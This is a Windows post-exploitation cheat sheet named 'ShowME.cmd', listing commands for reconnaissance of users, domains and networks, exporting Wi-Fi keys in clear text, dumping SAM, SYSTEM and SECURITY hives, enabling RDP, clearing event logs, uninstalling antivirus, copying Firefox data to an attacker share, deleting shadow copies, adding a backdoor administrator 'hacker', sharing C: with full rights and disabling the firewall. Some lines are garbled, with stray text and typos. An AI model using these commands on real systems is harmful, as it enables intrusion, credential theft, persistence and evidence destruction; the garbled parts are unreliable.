ShowME.cmd

1.  
2. #system
3. whoami
4. whoami /all
5. set
6.  
7. fsutil fsinfo drives
8. reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """"
9.  
10. #networking
11. ipconfig /all
12. ipconfig /displaydns
13. netstat -nabo
14. netstat -r
15. netstat -na | findstr :445
16. netstat -nao | findstr LISTENING
17. netstat -anob | findstr "services, process or port"
18. netsh diag show all
19. net view
20. net view /domain
21. net view /domain:otherdomain
22.  
23. net user %USERNAME% /domain
24. net user /domain
25. net accounts
26. net accounts /domain
27. net localgroup administrators
28. net group "Domain Admins" /domain
29.  
30. net group "Enterprise Admins" /domain
31. net group "Domain Controllers" r/domain
32. net share
33. net session | find / "\\"
34. arp -a
35. route print
36. browstat
37. netsh wlprofiles show profiles
38. netsh wlan export profile folder=. key=clear
39. netsh w`lan [start|stop] hostednetwork
40. netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent|temporary
41. netsh wlan set hostednetwork mode=[allow|disallow]
42. wmic ntdomain list
43.  
44. #configs
45. gpresult /z
46. sc qc <servicename>
47. sc query
48. sc queryex
49. type %WINDIR%\System32\drivers\etc\hosts
50. echo %COMSPEC%
51. c:\windows\system32\gathernetworkinfo.vbs
52.  
53. #finding important files
54. tree C:\ /f /a > C:\output_of_tree.txt
55. dir /a
56. dir /b /s [Directory or Filename]
57. dir \ /s /b | find /I "searchstring"
58. dir \ /s /b | find /I "mike"
59. command | find /c /v ""
60.  
61. #files to pull (if possible)
62. %SYSTEMDRIVE%\pagefile.sys
63. %WINDIR%\debug\NetSetup.log
64. %WINDIR%\repair\sam
65. %WINDIR%\repair\system
66. %WINDIR%\repair\software
67. %WINDIR%\repair\security
68. %WINDIR%\iis6.log (5, 6 or 7)
69. %WINDIR%\system32\logfiles\httperr\httperr1.log
70. %SystemDrive%\inetpub\logs\LogFiles
71. %WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)
72. %WINDIR%\system32\config\AppEvent.Evt
73. %WINDIR%\system32\config\SecEvent.Evt
74. %WINDIR%\system32\config\SysEvent.Evt
75. %WINDIR%\system32\config\default.sav
76. %WINDIR%\system32\config\security.sav
77. %WINDIR%\system32\config\software.sav
78. %WINDIR%\system32\config\system.sav
79. %WINDIR%\system32\CCM\logs\*.log
80. %USERPROFILE%\ntuser.dat
81. %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
82. %WINDIR%\System32\drivers\etc\hosts
83. unattend.txt, unattend.xml, sysprep.inf
84.  
85. #remote system access
86. net share \\computername
87. tasklist /V /S computername
88. qwinsta /SERVER:computername
89. qprocess /SERVER:computername *
90. net use \\computername
91. net use \\computername /user:DOMAIN\username password
92. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
93. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
94.  
95. #autostart dirs
96. %SystemDrive%\ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\
97.  
98. %SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp\
99. %SystemDrive%\wmiOWS\Start Menu\Programs\StartUp\
100. %SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\
101.  
102. #Persistence
103. WMI
104. wmic bios
105. wmic qfe qfe get hotfixid
106. (This gets patches IDs)
107. wmic startupwmic service
108. wmic process get caption,executablepath,commandline
109. wmic process call create "process_name" (executes a program)
110. wmic process where name="process_name" call terminate (terminates program)
111. wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information)
112. wmic useraccount (usernames, sid, and various security related goodies)
113. wmic useraccount get /ALL
114. wmic share get /ALL (you can use ? for gets help ! )
115. wmic startup list full (this can be a huge list!!!)
116. wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target)WE PRESENT YOU PORNHUB.COM
117. Reg Command exit
118. reg save HKLM\Security security.hive (Save security hive to a file)
119. reg save HKLM\System system.hive (Save system hive to a file)
120. reg save HKLM\SAM sam.hive (Save sam to a file)=
121. reg add [\\TargetIPaddr\] [RegDomain][ \Key ]
122. reg export [RegDomain]\[Key] [FileName]
123. reg import [FileName ]
124. reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values )
125.  
126. rem Deleting Logs
127. wevtutil el (list logs)
128. wevtutil cl <LogName> (Clear specific lowbadming)
129. del %WINDIR%\*.log /a /s /q /f
130.  
131. Uninstalling Software "AntiVirus" (Non interactive)
132. wmic product get name /value (this gets software names)
133. wmic product where name="XXX" call uninstall /nointeractive (this uninstalls software)
134.  
135. # Other (to be sorted)
136. pkgmgr usefull /iu :"Package"
137. pkgmgr usefull /iu :"TelnetServer" (Install Telnet Service ...)
138. pkgmgr /iu:"TelnetClient" (Client )
139. rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-)
140. wscript.exe <script js/vbs> - Invasive - may create message boxes-invasive-
141. cscript.exe <script js/vbs/c#>
142. xcopy /C /S %appdata%\Mozilla\Firefox\Profiles\*.sqlite \\your_box\firefox_funstuff
143. OS SPECIFICwmicWin2k3
144. winpop stat domainname
145. vssadmin.exe delete shadows /all /quiet (delete’s shadow copies for cleanup)
146.  
147. rem Vista/7
148. winstat features
149. wbadmin get status
150. wbadmin get items
151. gpresult /H gpols.htm
152. bcdedit /export <filename>
153.  
154. rem Vista SP1/7/2008/2008R2 (x86 & x64)
155.  
156. Enable/Disable Windows features with Deployment Image Servicing and Management (DISM):
157. *Note* Works well after bypassuac + getsystem (requires system privileges)
158. *Note2* For Dism.exe to work on x64 systems, the long commands are necessary
159.  
160. To list features which can be enabled/disabled:
161. %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features
162.  
163. To enable a feature (TFTP client for example):
164. %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-feature /featurename:TFTP
165.  
166. To disable a feature (again TFTP client):
167. %windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /disable-feature /featurename:TFTP
168.  
169. Invasive or Altering Commands
170.  
171. Command
172. Description
173. net user hacker hacker /add
174. Creates a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’
175. net localgroup administrators /add hacker
176. or
177. net localgroup administrators hacker /add
178. Adds the new user ‘hacker’ to the local administrators group
179. net share nothing$=C:\ /grant:hacker,FULL /unlimited
180. Shares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access, or modify anything on that drive.
181.  
182. One thing to note is that in newer (will have to look up exactly when, I believe since XP SP2) windows versions, share permissions and file permissions are separated. Since we added ournetsh selves as a local admin this isn’t a problem but it is something to keep in mind
183. net user username /active:yes /domain
184. Changes an inactive / disabled account to active. This can useful for re-enabling old domain admins to use, but still puts up a red flag if those accounts are being watched.
185. netsh firewall set opmode disable
186. Disables the local windows firewall
187. netsh firewall set opmode enable
188. Enables the local windows firewall. If rules are not in place for your connection, this could cause you to loose it.